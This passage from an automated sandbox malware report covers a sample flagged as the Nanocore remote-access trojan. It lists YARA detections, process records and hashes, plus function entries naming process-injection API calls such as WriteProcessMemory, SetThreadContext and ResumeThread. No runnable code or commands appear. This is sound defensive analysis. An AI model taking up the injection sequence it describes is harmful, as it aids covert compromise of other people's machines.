<kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000018.00000002.395603538.0000000003171000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000018.00000002.395603538.0000000003171000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

Chronological Activities

Analysis Process: dhcpmon.exe PID: 6648 Parent PID: 6188

General

Start time:	21:03:02
Start date:	13/10/2021
Path:	C:\Users\user\AppData\Local\Temp\dhcpmon.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\dhcpmon.exe
Imagebase:	0x7b0000
File size:	12288 bytes
MD5 hash:	5B3262B61A5EAA3EBE7E8BDC4958FC3F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000002.405182304.0000000003BB9000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000019.00000002.405182304.0000000003BB9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000002.404921378.0000000002BB1000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000019.00000002.404921378.0000000002BB1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000019.00000002.403212048.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000002.403212048.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000019.00000002.403212048.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

Chronological Activities

Analysis Process: dhcpmon.exe PID: 6732 Parent PID: 6304

General

Start time:	21:03:07
Start date:	13/10/2021
Path:	C:\Users\user\AppData\Local\Temp\dhcpmon.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\dhcpmon.exe
Imagebase:	0x10000
File size:	12288 bytes
MD5 hash:	5B3262B61A5EAA3EBE7E8BDC4958FC3F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000002.419717082.0000000002321000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000001A.00000002.419717082.0000000002321000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001A.00000002.415670197.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000002.415670197.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000001A.00000002.415670197.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000002.419911932.0000000003329000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000001A.00000002.419911932.0000000003329000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: LFEs2N6DU4.exe PID: 2752 Parent PID: 5804 LFEs2N6DU4.exeCOMMON

Executed Functions

Function 022719E2, Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efc841a87ff988bc162d06cf3cced254be1f9a7a6ed596848b5869fb0b02232c
Instruction ID: 95ad891eec510b2dbeb90c4af41e78b1e0ce6a5a00800d4d0bb374387ad8baf0
Opcode Fuzzy Hash: efc841a87ff988bc162d06cf3cced254be1f9a7a6ed596848b5869fb0b02232c
Instruction Fuzzy Hash: 967116B4D2C208CFDB14DFE9E9857ADBBF1BF48304F108019E00AA6268D7B85956CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0227BBEE, Relevance: 1.7, APIs: 1, Instructions: 244processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0227BE26

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 90d56217b3a811afbef11520e90de530979078ba7946dc116b75d92ba07a7e47
Instruction ID: 8321e552e1da1966d339cb59262de6062f869606a3fb4865ed08957d2e65a532
Opcode Fuzzy Hash: 90d56217b3a811afbef11520e90de530979078ba7946dc116b75d92ba07a7e47
Instruction Fuzzy Hash: 43915F71D14219CFDB10CFA5C841BEEBBB2BF48318F14856AE809A7294DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0227BBF0, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0227BE26

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 9787723888a19d81d90082dad128f4e7dbe614ebc615024c72830d47a1641e03
Instruction ID: ee4056b9b9a13fcd3460914cb63f959a510f9a37a81866ef4df5f2e8ac490d11
Opcode Fuzzy Hash: 9787723888a19d81d90082dad128f4e7dbe614ebc615024c72830d47a1641e03
Instruction Fuzzy Hash: ED915E71D14219CFDB20CFA5C841BEEBBB2FF48318F14856AE809A7294DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0227DD84, Relevance: 1.6, APIs: 1, Instructions: 112COMMON

Download Yara Rule

APIs

K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 0227DE91

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID: BaseModuleName
String ID:
API String ID: 595626670-0
Opcode ID: 56c87672a9f7618ad9fd95aecee09dd1a553d0c62b5b3faf94c46bc848391e58
Instruction ID: 93d78819058b4ffec36ceacc6f3e4e4d15a979805264b778168769b690f2df0c
Opcode Fuzzy Hash: 56c87672a9f7618ad9fd95aecee09dd1a553d0c62b5b3faf94c46bc848391e58
Instruction Fuzzy Hash: 8A4174B4D142488FDB05CFE9C894BDEBBF1BF58318F148469E819AB254C774A881CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0227DD90, Relevance: 1.6, APIs: 1, Instructions: 112COMMON

Download Yara Rule

APIs

K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 0227DE91

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID: BaseModuleName
String ID:
API String ID: 595626670-0
Opcode ID: d77468baec2849182a1bdd06060179f3d6327ab6d671c8a0936d3fd829a68294
Instruction ID: 497dfcce13d1ddc510d1587abc43c12990b4284ca3f69cb5a200c3c69c572d03
Opcode Fuzzy Hash: d77468baec2849182a1bdd06060179f3d6327ab6d671c8a0936d3fd829a68294
Instruction Fuzzy Hash: 15416574D142588FDB14CFA9C894BDEBBF1BF48318F148469E819AB354C774A841CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02279CA1, Relevance: 1.6, APIs: 1, Instructions: 84fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,00000000,?), ref: 02279D61

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: b3d7cc8f7b251e052dd35b0c2695e270ba36fa91e2425306df38d21344c61ca2
Instruction ID: 9500c9d790aab31b22a055cee7b50fa6a916e2a154f35b9b8399d43601417a0c
Opcode Fuzzy Hash: b3d7cc8f7b251e052dd35b0c2695e270ba36fa91e2425306df38d21344c61ca2
Instruction Fuzzy Hash: 4C318FB1C053599FDB01CFA9C8807EEBFF4AF49310F1980AAE844EB252D7349945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02279215, Relevance: 1.6, APIs: 1, Instructions: 75libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 022792B1

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6ffb5144ecae409adcc1a56d46d0bc23ae3f9dd18a293235ccc6eee05718ad51
Instruction ID: 8c02468041dafbf8a801f10a707277aa818587c141014bd7ef0fa544e0e16600
Opcode Fuzzy Hash: 6ffb5144ecae409adcc1a56d46d0bc23ae3f9dd18a293235ccc6eee05718ad51
Instruction Fuzzy Hash: C431E0B0D05248DFDB10CFE9D584BCEBBF5AF48314F24842AE405AB264DBB4A985CF95

Uniqueness

Uniqueness Score: -1.00%

Function 02279469, Relevance: 1.6, APIs: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 02279513

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 77ce3ea0fe535eae9205d3204f53c863d41451f7e21fff47949d75ce494f5f30
Instruction ID: b4ab4abb9e585ba0418868560a10c2fa920fc1b202276b0ee0780c5cf8157f76
Opcode Fuzzy Hash: 77ce3ea0fe535eae9205d3204f53c863d41451f7e21fff47949d75ce494f5f30
Instruction Fuzzy Hash: EE2177B59043999FCB10CFAAC884BDEBFF4BF48320F14846AE858A7251C3389545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0227BA40, Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0227BAD8

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 0ee4af527aa5cce84f35a1306ae8752d0e2ca3b95873dc439a1891f7c8016c9e
Instruction ID: cfbcdc3da2b0bf25441c47176fdbd080e1e50e1df9814e19421953f995baa6b0
Opcode Fuzzy Hash: 0ee4af527aa5cce84f35a1306ae8752d0e2ca3b95873dc439a1891f7c8016c9e
Instruction Fuzzy Hash: 3C2137759003499FCB00CFA9C885BEEBBF5FF88318F10842AE919A7250C7789945DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0227D944, Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(00000000,?,?), ref: 0227D9E3

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: 5539b6e2b45bfc8e8242dd68c81518f3da801072423e0b35090feb2c06f1620a
Instruction ID: 02410ed38a364fb1c86a7d55750d0a78550b1ce6b6d20b417789a6e845be6eaa
Opcode Fuzzy Hash: 5539b6e2b45bfc8e8242dd68c81518f3da801072423e0b35090feb2c06f1620a
Instruction Fuzzy Hash: 922114B5D01219DFCB00CFA9C985BDEFBB4BF08214F14812AE918B7640D778A945CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 02279220, Relevance: 1.6, APIs: 1, Instructions: 71libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 022792B1

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 01736b83fe80d8788c3541228ca180b8af5f4e744574637a345908a268ff35ab
Instruction ID: 1efdd17c9cc999e8443127e30541c720989ba9eb36041ac61d61f2ad6549ae71
Opcode Fuzzy Hash: 01736b83fe80d8788c3541228ca180b8af5f4e744574637a345908a268ff35ab
Instruction Fuzzy Hash: 1731FEB0D05248DFDB10CFE9D584BCEBBF5AF48314F20842AE409AB264DBB46885CF94

Uniqueness

Uniqueness Score: -1.00%

Function 02279CC8, Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,00000000,?), ref: 02279D61

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 653ab00dca80570d4127d67d31e728694176fbc856043143f59c6505b9af2752
Instruction ID: eee7541614757c5213a5434e790e957655c6cf6d1e010d214e0eeeb475dc5843
Opcode Fuzzy Hash: 653ab00dca80570d4127d67d31e728694176fbc856043143f59c6505b9af2752
Instruction Fuzzy Hash: 6B212CB1D013199FCB10CFA9D484BEEFBF4EF48310F14816AE808A7245D774A945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0227BA48, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0227BAD8

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 96172222dea5cbe77a2c0a2bc8708f1cf8ae2bcb4fe36631921b455a6fb3093a
Instruction ID: 1d69eaa9fe82a510559f4b85c8198f615bd2127f03a31e2b4d95398919d8aac1
Opcode Fuzzy Hash: 96172222dea5cbe77a2c0a2bc8708f1cf8ae2bcb4fe36631921b455a6fb3093a
Instruction Fuzzy Hash: 082128759003599FCB00DFA9C885BEEBBF5FF48314F10842AE918A7240D7789945DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0227B8A9, Relevance: 1.6, APIs: 1, Instructions: 65threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 0227B92E

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 1a2449cc502cfffa170d804211ef9e9ddf4b484294a53d238586b40000d53008
Instruction ID: 21c96fec8ae192163cfeab1056b45d1e875e893fc50f82676518559bda36bd7d
Opcode Fuzzy Hash: 1a2449cc502cfffa170d804211ef9e9ddf4b484294a53d238586b40000d53008
Instruction Fuzzy Hash: FE2125719003498FDB10CFAAC484BEEBBF4EF88318F14842ED559A7241CB789945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0227C33C, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00000000,?), ref: 0227E1D8

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID: ChildEnumWindows
String ID:
API String ID: 3555792229-0
Opcode ID: e000c07f0cf7b9aba7c4ca486003cd6ec8760761c0bbb774091c70812f0c81b0
Instruction ID: 272ba4d72d26fdf46539050da500ed4a891da79a8648f7d52d8124a96a569ca2
Opcode Fuzzy Hash: e000c07f0cf7b9aba7c4ca486003cd6ec8760761c0bbb774091c70812f0c81b0
Instruction Fuzzy Hash: A32135B59002098FDB14CFAAC845BEEBBF5EB88314F14846AE415A3290DB74A941CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0227C028, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0227C0B0

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 549d6d59ab9a8d31927a567e7a755445b0b38846317280afb2ccafdc0c4b6dd6
Instruction ID: 7310823d3b0981b2863cd5cb41fe3c8595108b3508dbcc268eb086c751ed4ec3
Opcode Fuzzy Hash: 549d6d59ab9a8d31927a567e7a755445b0b38846317280afb2ccafdc0c4b6dd6
Instruction Fuzzy Hash: 9B2136B5D003499FCB10CFA9C880BEEBBF5BF48314F50882AE518A7250D7389945DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0227C030, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0227C0B0

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: e555b979211eef2610c4144683feeb3dde7164aa783f3efb2d4d0e01605171bf
Instruction ID: 1316b76dd3d189c646720f4d7a6f1315d3040fa49d6a0b1c6b122afe0e27beed
Opcode Fuzzy Hash: e555b979211eef2610c4144683feeb3dde7164aa783f3efb2d4d0e01605171bf
Instruction Fuzzy Hash: 31212571D003599FCB10CFAAC884AEEBBF5FF48314F50882AE518A7250D7789945DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0227B8B0, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 0227B92E

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 300948919b21da7679f2504942f4265e5e3d9e9afde6792bfbc7b5faa6459fed
Instruction ID: 0aa5656502380d14a1c9313a4dee01dccf1d31397b515a9a9a258f003165a07e
Opcode Fuzzy Hash: 300948919b21da7679f2504942f4265e5e3d9e9afde6792bfbc7b5faa6459fed
Instruction Fuzzy Hash: D5211A71900309CFDB10DFAAC4847EEBBF4EF48358F54842AD559A7240DB789945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0227D960, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(00000000,?,?), ref: 0227D9E3

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: 54d78e83da8199e8b6f8c74243436b902a7eeffb6a1d4c2af85cebc9b4e2f8b1
Instruction ID: 40a60964c1177feb70f81978c03729808ef70fc23fe25ddd09a13e15b49e1ddd
Opcode Fuzzy Hash: 54d78e83da8199e8b6f8c74243436b902a7eeffb6a1d4c2af85cebc9b4e2f8b1
Instruction Fuzzy Hash: 1A21F3B1D016199FCB10CFAAC885BDEFBB4BF49314F14812AE508A7640D774A944CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0227E158, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00000000,?), ref: 0227E1D8

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID: ChildEnumWindows
String ID:
API String ID: 3555792229-0
Opcode ID: d6ab8c3fc45a494acf5451d673cdcb66836d408ac717b355a252228b70198052
Instruction ID: d8dec4e6838341c4f48efebb6abcca1c891b5622e8050461d56cd9f9e33d4a1f
Opcode Fuzzy Hash: d6ab8c3fc45a494acf5451d673cdcb66836d408ac717b355a252228b70198052
Instruction Fuzzy Hash: 872177B1D00209CFDB14CFA9C945BEEFBF5AF88314F14846AE455A3290C778A941CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0227DCC8, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 0227DD3B

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: f5134f5ad3574b72810ed5cfe0395dcbcc5c04cf4d64e8379ac90d936d8f8694
Instruction ID: 7c154c298a54cf0362bfb0f783dce74f04b2276245b235174f2ccd86c0c356a0
Opcode Fuzzy Hash: f5134f5ad3574b72810ed5cfe0395dcbcc5c04cf4d64e8379ac90d936d8f8694
Instruction Fuzzy Hash: C42106B6900249DFCB10CFAAC484BDEBBF4FF48324F14842AE558A7250D778A945DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0227DCC2, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 0227DD3B

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 4a4a52319a8a82f96969d5d84a2e4d2af09cd736b2a358a212685f08c99e3533
Instruction ID: fc4ebc34e4fd1700b50d48908af95da0e9c8362e5d92a77f9fdb6f6062b42488
Opcode Fuzzy Hash: 4a4a52319a8a82f96969d5d84a2e4d2af09cd736b2a358a212685f08c99e3533
Instruction Fuzzy Hash: 2221F4B6D00249DFCB10CFAAC584BDEBBF4BF48324F14842AE558A7650D378A945DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0227B980, Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0227B9F6

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c103c989c8e125e3fc4b0f0d9d0942b688d9a3ca7b6b90b8275f6a69ff9f3b95
Instruction ID: aedf35c11a828fb643451326aebf376371fb5036e17062210fa7984001d43637
Opcode Fuzzy Hash: c103c989c8e125e3fc4b0f0d9d0942b688d9a3ca7b6b90b8275f6a69ff9f3b95
Instruction Fuzzy Hash: BC116776900249CFCB10DFAAC844BEFBBF5AF88324F14881AE525A7250C7759940CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 022794A0, Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 02279513

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: a164ca15ba5bc9634b0b66c89e5ef9bb4bf73c597675bed4385e0dde1077ca23
Instruction ID: 423bf412e48d080591021e1b351abf15586ddc9bbfbff62cbcf24832d5ede043
Opcode Fuzzy Hash: a164ca15ba5bc9634b0b66c89e5ef9bb4bf73c597675bed4385e0dde1077ca23
Instruction Fuzzy Hash: F82117B59002599FCB10CF9AC484BDEFBF4FB48324F10842AE458A7250D374A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0227B988, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0227B9F6

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4d347612eb6c89e9fbb8bb2dbe45558576f5bfe6b47fa7875d611fc7d4dd1ee5
Instruction ID: cb8315514921f2fcb6b2ccdf7017914d87a190dc0ef17d975bddd37bdfce3049
Opcode Fuzzy Hash: 4d347612eb6c89e9fbb8bb2dbe45558576f5bfe6b47fa7875d611fc7d4dd1ee5
Instruction Fuzzy Hash: D2115671900249CFCB10DFEAC844BEFBBF9AF88328F14881AE515A7250C775A940DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0227B7F9, Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0227B862

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: ba30474d14b13510709067e549a78301cf5cc093328b98cc4b4c25f9a9f76e00
Instruction ID: 52cac01a8d78976a42a5040c74bdbe54d7cbae35dfe8e91ac6bf23110c3cadca
Opcode Fuzzy Hash: ba30474d14b13510709067e549a78301cf5cc093328b98cc4b4c25f9a9f76e00
Instruction Fuzzy Hash: F81134B1D003498ADB10CFAAC444BEEBBF8AB88318F24882ED519A7650C7759945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0227B800, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0227B862

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 3c22d94a0a384177b6f6bffc964e42e9938ee4df257cba7a9991e7de3a472e18
Instruction ID: fb2123db1578501fa00ffc6996b2e1bb4f12bda8428f1d4c3f7731add9676088
Opcode Fuzzy Hash: 3c22d94a0a384177b6f6bffc964e42e9938ee4df257cba7a9991e7de3a472e18
Instruction Fuzzy Hash: 21112871D00349CBDB10DFEAC4447EFBBF9AB88328F24882AD515A7650C774A945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0092D4D8, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.308880919.000000000092D000.00000040.00000001.sdmp, Offset: 0092D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c1fc40d0f124afcb725a05d5dccadab827940a0c294df0fb11eaed798ac85f1
Instruction ID: 3f8832c055270475db67131b0f839b4241d2bcf49c6c268a7aae7dec05f1ac92
Opcode Fuzzy Hash: 5c1fc40d0f124afcb725a05d5dccadab827940a0c294df0fb11eaed798ac85f1
Instruction Fuzzy Hash: A5210371505240DFDB00DF50E9C4F66BBA9FB98328F248969E8050B25EC37AD846CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0092D3EC, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.308880919.000000000092D000.00000040.00000001.sdmp, Offset: 0092D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fa44f8a03692b7c8c29b8db44f5e53a39216fffd6c3a5b3dcec34d0ca7f0f58
Instruction ID: b4c7bb1a9bab65202b925459af0f58f2f37c916dc368d4a61feaa7fdfacd5f03
Opcode Fuzzy Hash: 7fa44f8a03692b7c8c29b8db44f5e53a39216fffd6c3a5b3dcec34d0ca7f0f58
Instruction Fuzzy Hash: 08213A71505340DFDB04EF50E9C0F66BB69FB98324F24C969D8090B2AAC33AE846C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0093D030, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.308912946.000000000093D000.00000040.00000001.sdmp, Offset: 0093D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eab4543ca314930d428b80f77cc5ae0500fb9b78c61e9c039d758834c0eee1f
Instruction ID: 28d0b373a1f7dc590df9f66af9af8f8f6e793878bbf569b6b0f8e5773326093b
Opcode Fuzzy Hash: 3eab4543ca314930d428b80f77cc5ae0500fb9b78c61e9c039d758834c0eee1f
Instruction Fuzzy Hash: 072108B1505240DFDB18DF24E5D0B6ABBA9FBC4B14F34C969D8454B241C33ADC4BCAA2

Uniqueness

Uniqueness Score: -1.00%

Function 0093D006, Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.308912946.000000000093D000.00000040.00000001.sdmp, Offset: 0093D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a39be58b1d2d764253b10592405e60f082db09bc7096e9fdfcd7ac118b36aa88
Instruction ID: f7c898ad0d0620af8566000a813468ed1f163971cdecdf5e439a54640eb95a54
Opcode Fuzzy Hash: a39be58b1d2d764253b10592405e60f082db09bc7096e9fdfcd7ac118b36aa88
Instruction Fuzzy Hash: 5A21607154E3C09FD7078B24D9A0715BF75AB42710F2981EBC8848F6A7C379980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0092D4D3, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.308880919.000000000092D000.00000040.00000001.sdmp, Offset: 0092D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4274775be6c99b4271e93a1e0e4a35333169c36f293b5df4524ad4ee5e930615
